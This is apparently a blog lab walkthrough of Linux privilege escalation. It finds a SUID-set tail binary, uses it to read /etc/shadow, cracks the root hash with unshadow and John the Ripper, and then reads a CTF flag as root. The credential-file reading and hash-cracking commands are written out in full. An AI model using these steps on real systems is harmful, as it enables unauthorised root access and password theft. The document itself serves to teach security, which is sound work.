How to crack passwords with John the Ripper? Password hacking in real practice as an Ethical Hacker!

In the first part of this series we found out a user’s password with Hydra with simply attacking his account via SSH. It is a so called “dictionary attack”, and because of the lack of security measurements we could get into the remote system.

In this exercise we continue our Ethical Hacking journey and we will find a way to get root privileges on the remote machine. This is called privilege escalation.

Important note: cracking passwords in the wild is illegal! Do NOT do it out of the lab, unless you are a penetration tester with a signed contract!

The hacker’s machine: Kali Linux [192.168.23.131]

The attacked machine: Debian Bullseye [192.168.23.133]

The two machines can see each other on the network.

The attacked machine runs an SSHd with password authentication.

We know the name of the user on the system: badpassjoe

We already know the password of badpassjoe: admin123

https://youtu.be/8GbWefXSMRs

Step 1: access the password database

There are a lot of enumeration techniques that can help us to find a way to elevate privileges on a Linux server. The Penetration Tester must consider everything very carefully and find the attack vectors.

In this example we will check the binaries and look for the SUID bit.

SUID is a special permission that can allow a binary to run with elevated privileges. A file with SUID bit will execute as the user who owns the file. If this user is the root, then we can run the file as root.

The following command will list out every binary that has SUID bit set.

find / -type f \( -perm -4000 -o -perm -2000 \) -exec ls -l {} \; 2>/dev/null

We can already see something interesting! The tail command is used to investigate the contents of files, and it should not have a SUID bit set.

-rwsr-sr-x 1 root root 76864 Sep 24  2020 /usr/bin/tail

The /usr/bin/tail binary has the SUID bit and its owner is the root, so we know that we can exploit it to read files as root!

Let’s open GTFOBins and confirm it.

We can use the command to tail out a file as root.

We know that the Linux user and root passwords are stored in the /etc/shadow file. As a regular user we cannot read it because we get “Permission denied” message, but with this SUID bit on tail we will read the contents.

As badpassjoe we can read the /etc/shadow file with the following command

tail -c1G /etc/shadow

Let’s collect the contents of the /etc/shadow and /etc/passwd files to our Kali Linux box.

Now we are ready to crack the root password with John the Ripper on our Kali Linux!

Step 2: crack the collected password database

With the unshadow command we will combine the the two files to a password database.

unshadow passwd.txt shadow.txt > password.db

The two files are the contents of the /etc/passwd and the /etc/shadow, and we create a password.db file.

Let’s crack this with John the Ripper!

john --wordlist=top-ssh-mistakes.txt --format=crypt password.db

When we see the “Session completed.” message we can check the cracked passwords.

┌──(kali㉿kali)-[~]
└─$ john --show password.db                                        
root:Password1234:0:0:root:/root:/bin/bash

As we cracked the weak password of the root user, we can log in to the Debian Linux as badpassjoe and elevate privileges to root with the su command.

Let’s look around!

badpassjoe@debian:~$ su -
Password: 
root@debian:~# ls
flag.txt
root@debian:~# cat flag.txt 
TOM{OH_THE_ROOT}

Final thoughts

Never use a weak root password that is easy to guess from a dictionary.

Be careful with setting SUID bits on any binaries because it can open up a new attack surface for malicious actors.

If you have anything to share then please visit my Tom’s IT Cafe Discord Server